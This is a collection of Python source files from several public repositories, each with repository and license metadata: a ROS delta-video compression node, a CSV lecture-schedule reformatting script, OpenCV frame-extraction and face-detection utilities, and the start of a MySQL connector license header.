from multi_tracker.msg import Contourinfo, Contourlist, DeltaVid
from multi_tracker.msg import Trackedobject, Trackedobjectlist
from multi_tracker.srv import resetBackgroundService, RegisterROIs
import image_processing
# for basler ace cameras, use camera_aravis
# https://github.com/ssafarik/camera_aravis
# rosrun camera_aravis camnode
# default image: /camera/image_raw
# for firefley cameras, camera1394 does not provide timestamps but otherwise
# works. use point grey drivers.
# http://wiki.ros.org/pointgrey_camera_driver
# rosrun pointgrey_camera_driver camera_node
# default image: /camera/image_mono
# TODO have everything masked when ~wait_for_rois is true
# until rois are registered
# TODO TODO show mask for debugging
# The main tracking class, a ROS node
class Compressor:
def __init__(self):
'''
Default image_topic for:
Basler ace cameras with camera_aravis driver: camera/image_raw
Pt Grey Firefly cameras with pt grey driver : camera/image_mono
'''
# initialize the node
rospy.init_node('delta_compressor')
rospy.sleep(1)
self.child = None
# default parameters (parameter server overides them)
# TODO set via default yaml?
# share this default setting code?
# TODO does camera need to be global if multiple multi_trackers are
# going to operate on it? idiomatic way to do that? is what floris did
# the best?
self.params = {
'image_topic' : 'camera/image_raw',
'threshold' : 10,
# fireflies are bgr8, basler gige cams are mono8
'camera_encoding' : 'mono8',
'max_change_in_frame': 0.2,
'roi_l' : 0,
'roi_r' : -1,
'roi_b' : 0,
'roi_t' : -1,
'~circular_mask_x' : None,
'~circular_mask_y' : None,
'~circular_mask_r' : None,
'~roi_points' : None,
'~wait_for_rois' : False
}
for parameter, default_value in self.params.items():
# TODO shrink this try / except so it is just around
# get_param (and so regular self.param[key] calls
# could also be producing this error)?
use_default = False
try:
# this signifies private parameters
if parameter[0] == '~':
value = rospy.get_param(parameter)
else:
p = 'multi_tracker/delta_video/' + parameter
value = rospy.get_param(p)
# assumes strings like 'none' floris used
# should not be overwriting defaults of None.
# may not always be true.
# TODO could this be causing some problems? won't this always
# force default (of None) to be kept if ret is a str?
# TODO isn't self.params[parameter] == default_value? change to
# latter if so...
if self.params[parameter] is None:
if isinstance(value, str):
use_default = True
except KeyError:
use_default = True
if use_default:
rospy.loginfo(rospy.get_name() + ' using default parameter: ' +
parameter + ' = ' + str(default_value))
value = default_value
if parameter[0] == '~':
del self.params[parameter]
parameter = parameter[1:]
self.params[parameter] = value
# If we are tracking an experiment that is being played back
# ("retracking"), we don't want to further restrict roi, and we will
# always use the same camera topic.
if rospy.get_param('/use_sim_time', False):
self.params['image_topic'] = 'camera/image_raw'
self.params['roi_l'] = 0
self.params['roi_r'] = -1
self.params['roi_b'] = 0
self.params['roi_t'] = -1
self.clear_rois()
# TODO TODO share in utility module w/ liveviewer somehow
# should i allow both roi_* and wait_for_rois?
roi_params = ['circular_mask_x', 'circular_mask_y',
'circular_mask_r', 'roi_points']
if self.params['wait_for_rois']:
if any(map(lambda x: self.params[x] != None, roi_params)):
rospy.logfatal('liveviewer: roi parameters other than ' +
'rectangular roi_[l/r/b/t] are not supported when ' +
'wait_for_rois is set to True')
# add single rois defined in params to instance variables for
# consistency later roi_* are still handled differently, and can be set
# alongside tracker roi_*'s which are now private (node specific)
# parameters
else:
# TODO should i write this to allow for saving each
# roi in a separate bag? i'm leaning towards no,
# because i'm not seeing what use cases would benefit
# from that...
n = rospy.get_name()
try:
node_num = int(n.split('_')[-1])
except ValueError:
node_num = 1
circle_param_names = ['circular_mask_x',
'circular_mask_y',
'circular_mask_r']
self.add_roi(node_num, circle_param_names)
poly_param_names = ['roi_points']
self.add_roi(node_num, poly_param_names)
self.save_data = rospy.get_param('multi_tracker/delta_video/save_data',
True)
if not self.save_data:
rospy.logwarn('delta_video not saving data! multi_tracker' +
'/delta_video/save_data was False')
self.debug = rospy.get_param('multi_tracker/delta_video/debug', False)
self.use_original_timestamp = rospy.get_param(
'multi_tracker/retracking_original_timestamp', False)
self.experiment_basename = rospy.get_param(
'multi_tracker/experiment_basename', None)
if self.experiment_basename is None:
rospy.logwarn('Basenames output by different nodes in this ' +
'tracker run may differ!')
self.experiment_basename = time.strftime('%Y%m%d_%H%M%S',
time.localtime())
self.explicit_directories = rospy.get_param(
'multi_tracker/explicit_directories', False)
# TODO break into util function?
node_name = rospy.get_name()
last_name_component = node_name.split('_')[-1]
try:
self.pipeline_num = int(last_name_component)
remap_topics = True
except ValueError:
self.pipeline_num = 1
remap_topics = False
delta_video_topic = 'multi_tracker/delta_video'
if remap_topics:
delta_video_topic = delta_video_topic + '_' + str(self.pipeline_num)
# Publishers - publish pixel changes
self.pubDeltaVid = rospy.Publisher(delta_video_topic, DeltaVid,
queue_size=30)
# Just for easier debugging. Saving this directly would immediately null
# the entire point of this node (to save only a sparse subset of
# pixels to reduce file size).
self.pub_threshed = rospy.Publisher('delta_video/thresholded', Image,
queue_size=5)
self.pub_changed_frac = rospy.Publisher(
'delta_video/changed_pixel_frac', Float32, queue_size=5)
# determine what kind of differences from background frame we are
# interested in
tracking_fn = rospy.get_param('multi_tracker/tracker/image_processor')
if tracking_fn == 'dark_objects_only':
self.sign = -1
elif tracking_fn == 'light_objects_only':
self.sign = 1
else:
# will just use absdiff if the sign of the deviations of interest
# isn't obvious from the name of the tracking function
self.sign = 0
# background reset service
self.reset_background_flag = False
# TODO was this supposed to be triggered every time tracker was?
# any reasons not to?
# TODO TODO refactor so that all background resets go through this node?
self.reset_background_service = rospy.Service(
'multi_tracker/delta_video/reset_background',
resetBackgroundService, self.reset_background)
self.cvbridge = CvBridge()
self.imgScaled = None
self.backgroundImage = None
self.background_img_filename = None
# buffer locking
self.lockBuffer = threading.Lock()
self.image_buffer = []
self.framestamp = None
self.current_background_img = 0
# Subscriptions - subscribe to images, and tracked objects
self.image_mask = None
# TODO correct?
if not self.params['wait_for_rois']:
# size of header + data
sizeImage = 128+1024*1024*3
self.subImage = rospy.Subscriber(self.params['image_topic'], Image,
self.image_callback, queue_size=5, buff_size=2*sizeImage,
tcp_nodelay=True)
s = rospy.Service('register_rois', RegisterROIs, self.register_rois)
# TODO does this need a rospy.spin / spinOnce to work?
def clear_rois(self):
"""
Does not clear mask.
"""
self.have_rois = False
self.circular_rois = dict()
self.polygonal_rois = dict()
self.rectangular_rois = dict()
# make less convoluted
def add_roi(self, node_num, param_names):
r = dict()
have_params = list(map(lambda x: self.params[x] != None, param_names))
#rospy.logwarn(have_params)
if any(have_params):
if all(have_params):
for p in param_names:
#rospy.logwarn(p)
#rospy.logwarn(self.params[p])
r[p] = self.params[p]
else:
rospy.logfatal('liveviewer: incomplete definition of roi type' +
'. need all of : ' + str(param_names))
else:
return
#rospy.logwarn(param_names)
#rospy.logwarn(r)
if 'roi_points' in param_names:
hull = cv2.convexHull(np.array(r['roi_points'], dtype=np.int32))
self.polygonal_rois[node_num] = hull
elif 'circular_mask_x' in param_names:
self.circular_rois[node_num] = r
elif 'roi_l' in param_names:
self.rectangular_rois[node_num] = r
def reset_background(self, service_call):
rospy.logwarn('delta video service for resetting background was ' +
'invoked')
self.reset_background_flag = True
# TODO remove?
return 1
def image_callback(self, rosimg):
with self.lockBuffer:
self.image_buffer.append(rosimg)
def process_image_buffer(self, rosimg):
if self.framestamp is not None:
self.dtCamera = (rosimg.header.stamp - self.framestamp).to_sec()
else:
# TODO warn if falling back to this? potential to cause problems?
self.dtCamera = 0.03
self.framenumber = rosimg.header.seq
self.framestamp = rosimg.header.stamp
# Convert the image.
try:
# might need to change to bgr for color cameras
img = self.cvbridge.imgmsg_to_cv2(rosimg, 'passthrough')
except CvBridgeError, e:
# TODO just make this fatal?
rospy.logerr('Exception converting background image from ROS to ' +
'OpenCV: %s' % e)
# TODO maybe rethink this step (not sure what would be an appropriate
# way to threshold acrossthe colors otherwise though... seems this would
# keep params more const across grayscale & color cameras)
# TODO maybe warn / err if img has len(shape) != 2 and also not matching
# the conditional below
if len(img.shape) == 3 and img.shape[2] == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# TODO i guess i could see a case for this not being mutually exclusive
# w/ the circular mask?
self.imgScaled = img[self.params['roi_b']:self.params['roi_t'],
self.params['roi_l']:self.params['roi_r']]
self.shapeImage = self.imgScaled.shape # (height,width)
# TODO define a self var in init that dictates whether we should mask?
if self.have_rois:
if self.image_mask is None:
self.image_mask = np.zeros_like(self.imgScaled)
fill_color = [1,1,1]
for r in self.circular_rois.values():
# need to cast? TODO
cv2.circle(self.image_mask, (r['circular_mask_x'],
r['circular_mask_y']), int(r['circular_mask_r']),
fill_color, -1)
for r in self.polygonal_rois.values():
cv2.fillConvexPoly(self.image_mask, r, fill_color)
for r in self.rectangular_rois:
# TODO correct? shape?
self.image_mask[r['roi_b']:r['roi_t'],
r['roi_l']:r['roi_r']] = fill_color
self.imgScaled = self.image_mask*self.imgScaled
def background_png_name():
if (rospy.get_param('/use_sim_time', False) and
self.use_original_timestamp):
# TODO make sure everything that loads these doesn't break w/
# addition of seconds
background_img_filename = self.experiment_basename + \
time.strftime('_deltavideo_bgimg_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.png',
time.localtime(rospy.Time.now().to_sec()))
else:
background_img_filename = self.experiment_basename + \
time.strftime('_deltavideo_bgimg_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.png', time.localtime())
if self.explicit_directories:
data_directory = os.path.expanduser(
rospy.get_param('multi_tracker/data_directory'))
else:
# TODO is this cwd really what i want?
data_directory = os.path.join(os.getcwd(),
self.experiment_basename)
return os.path.join(data_directory, background_img_filename)
### image processing function ##########################################
# TODO it doesn't seem like self.current_background_img counter is used?
# was it ever? remove?
# If there is no background image, grab one, and move on to the next
# frame.
if self.backgroundImage is None:
self.backgroundImage = copy.copy(self.imgScaled)
self.background_img_filename = background_png_name()
if self.save_data:
rospy.loginfo('delta_video saving first background image to ' +
self.background_img_filename)
# TODO fix offset (indices probably shifted to left, up one)
#rospy.logwarn(self.backgroundImage)
#rospy.logwarn(self.backgroundImage.shape)
success = cv2.imwrite(self.background_img_filename,
self.backgroundImage)
# restarting seemed to fix this for me once, unclear why
if (not success or not
(os.path.exists(self.background_img_filename) and
os.path.getsize(self.background_img_filename) > 8)):
# TODO i'd rather do without he sys.exit call, but logfatal
# didn't seem to kill the node... why wouldnt it?
rospy.logfatal('background image png was not saved ' +
'correctly. reason unknown. you may consider ' +
'restarting.')
sys.exit()
self.current_background_img += 1
return
# TODO TODO include a thread lock on reset bg flag + lock when writing?
# TODO will this be true by default? if so, is it always saving two
# images? maybe get rid of the above?
if self.reset_background_flag:
self.reset_background_flag = False
#rospy.loginfo('resetting background')
# put behind debug flag
#assert not np.allclose(self.backgroundImage, self.imgScaled)
self.backgroundImage = copy.copy(self.imgScaled)
self.background_img_filename = background_png_name()
if self.save_data:
#rospy.loginfo('writing to ' + self.background_img_filename)
# TODO also check for success as above
# refactor into function
cv2.imwrite(self.background_img_filename, self.backgroundImage)
self.current_background_img += 1
return
# calculate the difference from the background
# sign set in __init__ based on name of tracking function
# (defaults to 0)
# TODO test
'''
if self.sign == -1:
# TODO need to multiply one by -1?
self.diff = self.backgroundImage - self.imgScaled
elif self.sign == 1:
self.diff = self.imgScaled - self.backgroundImage
else:
'''
# TODO temporary hack fix. revert. (?)
self.diff = cv2.absdiff(self.imgScaled, self.backgroundImage)
#rospy.loginfo('comparing to threshold ' +
# str(self.params['threshold']))
changed_pixels = np.where(self.diff > self.params['threshold'])
delta_msg = DeltaVid()
header = Header(stamp=self.framestamp,frame_id=str(self.framenumber))
delta_msg.header = header
delta_msg.background_image = self.background_img_filename
if len(changed_pixels[0]) > 0:
delta_msg.xpixels = changed_pixels[0].tolist()
delta_msg.ypixels = changed_pixels[1].tolist()
delta_msg.values = self.imgScaled[changed_pixels].reshape(
len(changed_pixels[0])).tolist()
else:
# TODO why preferable for first two fields but not the values?
delta_msg.xpixels = [0]
delta_msg.ypixels = [0]
#delta_msg.values = [0]
# TODO not much overhead on this, right?
if self.pub_threshed.get_num_connections() > 0:
retval, threshed = cv2.threshold(self.diff,
self.params['threshold'], 255, 0)
# TODO passthru cheaper + an option here?
# TODO maybe support color w/ "any" operation across color channel
# to compare to what K was doing before (though not sure delta
# message was actually treating color channels correctly / saving
# all of them in reality anyway?)
img = self.cvbridge.cv2_to_imgmsg(threshed, 'mono8')
self.pub_threshed.publish(img)
self.pubDeltaVid.publish(delta_msg)
'''
if the fraction of the frame that changed is too large, reset the
background
- if this is small, it the background will reset more often, in the
limit maybe only saving the edges of the flies
- if this is large, the background may never reset, probably losing
flies when they cross their original positions, and likely storing
more data than necessary (particularly if something gets bumped or
lighting changes)
'''
changed_fraction = (len(changed_pixels[0]) /
(self.diff.shape[0] * self.diff.shape[1]))
if self.pub_changed_frac.get_num_connections() > 0:
# TODO maybe timestamp this for recording -> troubleshooting
# purposes?
self.pub_changed_frac.publish(Float32(changed_fraction))
# TODO TODO this was printed several times but no new png. what gives?
# flag ever effecting?
if (not self.reset_background_flag and
changed_fraction > self.params['max_change_in_frame']):
rospy.logwarn(os.path.split(__file__)[-1] + ': resetting ' +
'background image for # changed fraction of pixels (' +
str(changed_fraction) + ') > max_change_in_frame ' +
'(' + str(self.params['max_change_in_frame']) + ')')
self.reset_background_flag = True
# TODO test
# TODO TODO save rois
def register_rois(self, req):
"""
"""
# TODO maybe make all of this parameter setting / saving optional?
# as of 2017-Aug, only one of lists will be non-empty.
for i, r in enumerate(req.rectangular_rois):
roi_dict = dict()
roi_dict['roi_t'] = r.t
roi_dict['roi_b'] = r.b
roi_dict['roi_l'] = r.l
roi_dict['roi_r'] = r.r
self.rectangular_rois[i] = roi_dict
# TODO does this format make the most sense?
rospy.set_param('~' + str(i) + '/roi_t', r.t)
rospy.set_param('~' + str(i) + '/roi_b', r.b)
rospy.set_param('~' + str(i) + '/roi_l', r.l)
rospy.set_param('~' + str(i) + '/roi_r', r.r)
for i, r in enumerate(req.polygonal_rois):
points = []
for p in r.points:
points.append([p.x, p.y])
hull = cv2.convexHull(np.array(points, dtype=np.int32))
self.polygonal_rois[i] = hull
rospy.set_param('~' + str(i) + '/roi_points', points)
for i, r in enumerate(req.circular_rois):
roi_dict = dict()
roi_dict['circular_mask_x'] = r.x
roi_dict['circular_mask_y'] = r.y
roi_dict['circular_mask_r'] = r.r
self.circular_rois[i] = roi_dict
rospy.set_param('~' + str(i) + '/circular_mask_x', r.x)
rospy.set_param('~' + str(i) + '/circular_mask_y', r.y)
rospy.set_param('~' + str(i) + '/circular_mask_r', r.r)
# TODO TODO why wasn't i just saving this in roi_finder? move it there?
# this doesn't predate me, does it (others have dependencies on it?)?
roi_param_filename = time.strftime('compressor_rois_%Y%m%d_%H%M%S_N' +
str(self.pipeline_num) + '.yaml',
time.localtime(rospy.Time.now().to_sec()))
# now invoke the snapshot_param node in this namespace to dump the
# TODO maybe save through other means? just pickle? api for launching
# single nodes?
params = ['roslaunch', 'multi_tracker', 'snapshot_params.launch',
'ns:=' + rospy.get_namespace(), 'filename:=' + roi_param_filename]
self.child = Popen(params)
self.have_rois = True
sizeImage = 128+1024*1024*3 # Size of header + data.
self.subImage = rospy.Subscriber(self.params['image_topic'],
Image,
self.image_callback,
queue_size=5,
buff_size=2*sizeImage,
tcp_nodelay=True)
# this seems to be what ros expects for return
# when service does not specify a return type
return []
def main(self):
if self.params['wait_for_rois']:
rate = rospy.Rate(5) # Hz:
while not rospy.is_shutdown():
if self.have_rois:
break
rate.sleep()
while not rospy.is_shutdown():
with self.lockBuffer:
time_then = rospy.Time.now()
if len(self.image_buffer) > 0:
self.process_image_buffer(self.image_buffer.pop(0))
if len(self.image_buffer) > 3:
pt = (rospy.Time.now() - time_then).to_sec()
rospy.logwarn("Delta video processing time exceeds " +
"acquisition rate. Processing time: %f, Buffer: %d",
pt, len(self.image_buffer))
if not self.child is None:
self.child.kill()
if __name__ == '__main__':
compressor = Compressor()
compressor.main()
|
tom-f-oconnell/multi_tracker
|
nodes/delta_video_simplebuffer.py
|
Python
|
mit
| 25,393
|
# encoding: utf-8
import csv
from datetime import date
import datetime
from collections import defaultdict
class ManipulateCSVFile:
# Add filepaths!
def __init__(self):
self.lecture = '/home/aleksanderhh/Downloads/Database/Lectures.csv'
self.lectureFixed = '/home/aleksanderhh/Downloads/Database/LecturesFixed.csv'
self.lectureFixedDate = '/home/aleksanderhh/Downloads/Database/LecturesFixedDate.csv'
self.tdtCourses = '/home/aleksanderhh/Downloads/Database/TDT_Courses.csv'
self.courseCoordinator = '/home/aleksanderhh/Downloads/Database/CourseCoordinator.csv'
self.lecturer = '/home/aleksanderhh/Downloads/Database/Lecturer.csv'
self.semester = '/home/aleksanderhh/Downloads/Database/Semester.csv'
self.temp = '/home/aleksanderhh/Downloads/Database/temp.csv'
# Commandline for choosing file to manipulate
def chooseFile(self, choice):
string = ("What file do you wan't to manipulate? \n0: Lecture \n1: TDT Courses\n2: Course coordinator \n3: Lecturer \n4: Semester \nChoice: ")
if(choice == 0):
choice = input(string)
if(choice == 0):
return self.lecture
elif(choice == 1):
return self.tdtCourses
elif(choice == 2):
return self.courseCoordinator
elif(choice == 3):
return self.lecturer
elif(choice == 4):
return self.semester
elif(choice == 5):
return self.lectureFixed
else:
print "You didn't choose any of the options"
# Returns TDT courses csv filepath
def getCourseCodeFilePath(self):
return self.tdtCourses
# Prints out content in csv file
def readCSV(self, file):
csvFile = open(file,'r')
for row in csvFile:
print ', '.join(row)
csvFile.close()
# Fetch and saves a specific column in csv file to a list
def fetchFromCSV(self, file, columnName):
columns = defaultdict(list)
with open(file) as f:
reader = csv.DictReader(f)
for row in reader:
for (k,v) in row.items():
columns[k].append(v)
return columns[columnName]
# Writes to csv file
def writeToCSV(self, file, string):
csvFile = open(file,'a')
csvFile.write(string)
csvFile.close()
# Count lines in csv file
def countLinesInCSV(self, file):
numCourses = sum(1 for line in open(file))
return numCourses
# Deletes information stored in the csv-file
def cleanCSVFile(self, file):
csvFile = open(file,'w')
csvFile.close()
# Makes the csv file correct for implementation to sql database
def fixLectureWeeks(self):
fileRead = self.lecture # HUSK Å ENDRE TIL LECTURE
fileWrite = self.lectureFixed
with open(fileRead) as f:
for line in f:
row = line.split(',')
courseCode = row[0]
startTime = row[1]
weekDay = row[2]
room = row[len(row)-2]
weekNum1 = row[3].replace('"', "")
if(weekNum1.find('-') != -1):
weekNum1S = weekNum1.split('-')
for week1 in range(int(weekNum1S[0]), int(weekNum1S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week1) + '",' + room + ',\n'))
else:
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum1 + '",' + room + ',\n'))
if(row[4] != room):
weekNum2 = row[4].replace('"', "")
if(weekNum2.find('-') != -1):
weekNum2S = weekNum2.split('-')
for week2 in range(int(weekNum2S[0]), int(weekNum2S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week2) + '",' + room + ',\n'))
else:
self.writeToCSV(fileWrite, (courseCode + "," + startTime + "," + weekDay + ',"' + weekNum2 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room):
weekNum3 = row[5].replace('"', "")
if(weekNum3.find('-') != -1):
weekNum3S = weekNum3.split('-')
for week3 in range(int(weekNum3S[0]), int(weekNum3S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week3) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum3 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room and row[6] != room):
weekNum4 = row[6].replace('"', "")
if(weekNum4.find('-') != -1):
weekNum4S = weekNum4.split('-')
for week4 in range(int(weekNum4S[0]), int(weekNum4S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week4) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum4 + '",' + room + ',\n'))
if(row[4] != room and row[5] != room and row[6] != room and row[7] != room):
weekNum5 = row[7].replace('"', "")
if(weekNum5.find('-') != -1):
weekNum5S = weekNum5.split('-')
for week5 in range(int(weekNum5S[0]), int(weekNum5S[1])+1):
self.writeToCSV(fileWrite, (courseCode + ',' + startTime + ',' + weekDay + ',"' + str(week5) + '",' + room + ',\n'))
else:
self.writeToCSV(self.lectureFixed, (courseCode + ',' + startTime + ',' + weekDay + ',"' + weekNum5 + '",' + room + ',\n'))
# Returns date from weekday, weeknumber and year
def getDate(self, weekDay, weekNum):
year = date.today().year
return (datetime.date(year,1,1) + datetime.timedelta(weekNum * 7 - weekDay))
# Convert weekday and week to date
def lectureToDateFormat(self):
with open(self.lectureFixed) as f:
for line in f:
row = line.split(',')
courseCode = row[0]
startTime = row[1]
weekDay = int(row[2].replace('"', ""))
weekNum = int(row[3].replace('"', ""))
room = row[4]
self.writeToCSV(self.lectureFixedDate, (courseCode + ',' + startTime + ',"' + str(self.getDate(weekDay, weekNum)) + '",' + room + '\n'))
|
henrikbossart/courseTracker
|
server_scripts/Scraper/manipulateCSV.py
|
Python
|
mit
| 7,046
|
#!/usr/bin/python
import rospy
import rospkg
import os
from std_msgs.msg import String
from trajectory_analysis_gui.srv import *
from ms_face_api.srv import *
from ms_face_api.msg import *
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import glob
import os
import cv2
import json
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
# get the file path
path=rospack.get_path('users_analysis')
haarcascade_path=path+'/opencv_haarcascades'
class ExtractFrame():
def __init__(self) :
self.faceCascade = cv2.CascadeClassifier(haarcascade_path+"/haarcascade_face.xml")
self.videoname=None
self.videopath=None
self.arrayvideofolders=None
self.videofolder=None
self.array_timestamps=[]
self.capture=None
self.videolength=None
def load_info_video(self,path_videos,videofolder,name_file):
self.videoname=name_file
self.videopath=path_videos
self.videofolder=videofolder
with open(self.videopath+'/info_videos_'+self.videofolder+'.json', 'r') as f:
videodata = json.load(f)
#print 'videodata=',videodata
for ivideo in videodata['video']:
if ivideo['name']==self.videoname:
self.array_timestamps=ivideo['timestamps']
self.capture = cv2.VideoCapture(self.videopath+'/'+self.videofolder+'/'+self.videoname) #video_name is the video being called
while not self.capture.isOpened():
pass
self.videolength = int(self.capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
def video_from_timestamp(self,timestamp):
self.videopath=None
for self.videofolder in self.arrayvideofolders:
if self.videopath is None:
with open(self.videopath+'/info_videos_'+self.videofolder+'.json', 'r') as f:
videodata = json.load(f)
#print 'videodata=',videodata
for ivideo in videodata['video']:
# print 'videoname=',ivideo['name']
# print 'inittimestamp=',ivideo['timestamps'][0]['timestamp']
# print 'endtimaestamp=',ivideo['timestamps'][len(ivideo['timestamps'])-1]['timestamp']
# print 'timestamp=',timestamp
if int(ivideo['timestamps'][0]['timestamp']) <= int(timestamp) < int(ivideo['timestamps'][len(ivideo['timestamps'])-1]['timestamp']):
print 'IF'
self.array_timestamps=ivideo['timestamps']
self.videoname=ivideo['name']
self.videopath=self.videopath+'/'+self.videofolder+'/'+self.videoname
self.array_timestamps=ivideo['timestamps']
self.capture = cv2.VideoCapture(self.videopath+'/'+self.videofolder+'/'+self.videoname) #video_name is the video being called
while not self.capture.isOpened():
pass
self.videolength = int(self.capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
break
print 'self.videopath=',self.videopath
return self.videopath
def show_frame(self,timestamp,name_window):
numframe=self.estimate_frame(timestamp)
print 'numframe=',numframe
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow(name_window, frame) # show frame on window
def save_frame(self,numframe=None,timestamp=None):
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow('window_name', frame) # show frame on window
key=cv2.waitKey(0)
def show_gif(self,init_timestamp,end_timestamp,name_window):
init_numframe=self.estimate_frame(init_timestamp)
end_numframe=self.estimate_frame(end_timestamp)
gif_numframe=init_numframe
while gif_numframe<end_numframe:
self.capture.set(1,gif_numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow(name_window, frame) # show frame on window
time.sleep(0.2)
#key=cv2.waitKey(0)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
gif_numframe +=1
key=cv2.waitKey(0)
def save_roi(self,numframe,rect_target,name,timestamp,path_folder_output):
ymin=rect_target.y_offset
ymax=rect_target.y_offset+rect_target.height
xmin=rect_target.x_offset
xmax=rect_target.x_offset+rect_target.width
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
roi_new_user=frame[ymin:ymax,xmin:xmax]
path_image=path_folder_output+'/'+name
if not os.path.exists(path_image):
os.makedirs(path_image)
cv2.imwrite(path_image+'/'+str(timestamp)+'.png',roi_new_user)
path_image=path_folder_output+'/frames'
if not os.path.exists(path_image):
os.makedirs(path_image)
cv2.imwrite(path_image+'/'+str(timestamp)+'.png',frame)
def rosimage(self,numframe=None,timestamp=None):
resp=None
if numframe is None:
numframe=self.estimate_frame(timestamp)
if numframe is not None:
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow('window_name', frame) # show frame on window
#image=Image()
bridge = CvBridge()
ros_image=bridge.cv2_to_imgmsg(frame, "bgr8")
return ros_image ,numframe
# def ms_face_api_call_file(self,numframe=None,timestamp=None):
#
# #
# #sensor_msgs/Image image
# ## if a filename is given, load the file
# #string filename
# ## if a topic name is given, wait for an image on that topic
# #string topic
# #bool identify
# #---
# #ms_face_api/Faces faces
#
# self.capture.set(1,numframe); # Where numframe is the frame you want
# ret, frame = self.capture.read() # Read the frame
# cv2.imshow('window_name', frame) # show frame on window
# filename='/media/robpin/data/videos/collect_data_y4/actively_engaged/'+str(timestamp)+'.png'
# cv2.imwrite(filename,frame)
#
# image=Image()
#
# print 'CALLING SERVICE'
#
# #resp=ms_face_call(image,'/media/robpin/data/videos/collect_data_y4/2016_11/2016_11_11/843.png','',False)
# resp=ms_face_call(image,filename,'',False)
#
# iface=0
# for face in resp.faces.faces:
#
# color=(0, 255, 0)
# cv2.rectangle(frame, (face.faceRectangle.x_offset, face.faceRectangle.y_offset), (face.faceRectangle.x_offset+face.faceRectangle.width, face.faceRectangle.y_offset+face.faceRectangle.height), color, 2)
# font = cv2.FONT_HERSHEY_SIMPLEX
# cv2.putText(frame,"Person "+str(iface),(face.faceRectangle.x_offset, face.faceRectangle.y_offset - 5), font, 0.7,color,2)
# iface+=1
#
# cv2.imshow('window_name', frame) # show frame on window
#
# return resp
def estimate_frame(self, timestamp) :
length_timestamp=None
inf_frame=None
length_frames=None
inf_timestamp=None
for i in range(len(self.array_timestamps)-1):
if int(self.array_timestamps[i]['timestamp']) <= timestamp < int(self.array_timestamps[i+1]['timestamp']):
length_timestamp=int(self.array_timestamps[i+1]['timestamp'])-int(self.array_timestamps[i]['timestamp'])
length_frames=int(self.array_timestamps[i+1]['num_frame'])-int(self.array_timestamps[i]['num_frame'])
inf_frame=int(self.array_timestamps[i]['num_frame'])
inf_timestamp=int(self.array_timestamps[i]['timestamp'])
nframe=None
if length_frames is not None:
video_rate=float(length_timestamp)/float(length_frames)
nframe=float(float(timestamp-inf_timestamp)/video_rate)+inf_frame
nframe=int(round(nframe))
return nframe
def estimate_timestamp(self, numframe) :
#print 'current_timestamp=',timestamp
length_timestamp=None
inf_frame=None
length_frames=None
inf_timestamp=None
for i in range(len(self.array_timestamps)-1):
if int(self.array_timestamps[i]['num_frame']) <= numframe < int(self.array_timestamps[i+1]['num_frame']):
length_timestamp=int(self.array_timestamps[i+1]['timestamp'])-int(self.array_timestamps[i]['timestamp'])
length_frames=int(self.array_timestamps[i+1]['num_frame'])-int(self.array_timestamps[i]['num_frame'])
inf_frame=int(self.array_timestamps[i]['num_frame'])
inf_timestamp=int(self.array_timestamps[i]['timestamp'])
#print 'length_frames=',length_frames
#print 'inf_frame=',inf_frame
nframe=None
if length_frames is not None:
video_rate=float(length_timestamp)/float(length_frames)
# nframe=float(float(timestamp-inf_timestamp)/video_rate)+inf_frame
#
# nframe=int(round(nframe))
timestamp=float(float(numframe-inf_frame)*video_rate)+inf_timestamp
timestamp=int(round(timestamp))
#print 'nframe=',nframe
return timestamp
def detect_faces(self ,timestamp,framesnumber=1,increment=1):
faces=None
numframe=self.estimate_frame(timestamp)
newframe=numframe
if numframe is not None:
indexframe=0
countframesnumber=0
while countframesnumber < framesnumber:
try:
newframe=numframe+indexframe
self.capture.set(1,newframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('face detection', gray)
# Detect faces in the image
faces = self.faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
indexframe=indexframe+increment
countframesnumber+=1
if len(faces)>0:
print 'detect_faces break'
break
except:
pass
return faces,newframe
def detect_faces_image(self ,image):
faces=None
frame=cv2.imread(image)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = self.faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
return faces
|
strands-project/aaf_deployment
|
face_analysis/scripts/opencv_tools.py
|
Python
|
mit
| 12,514
|
# MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
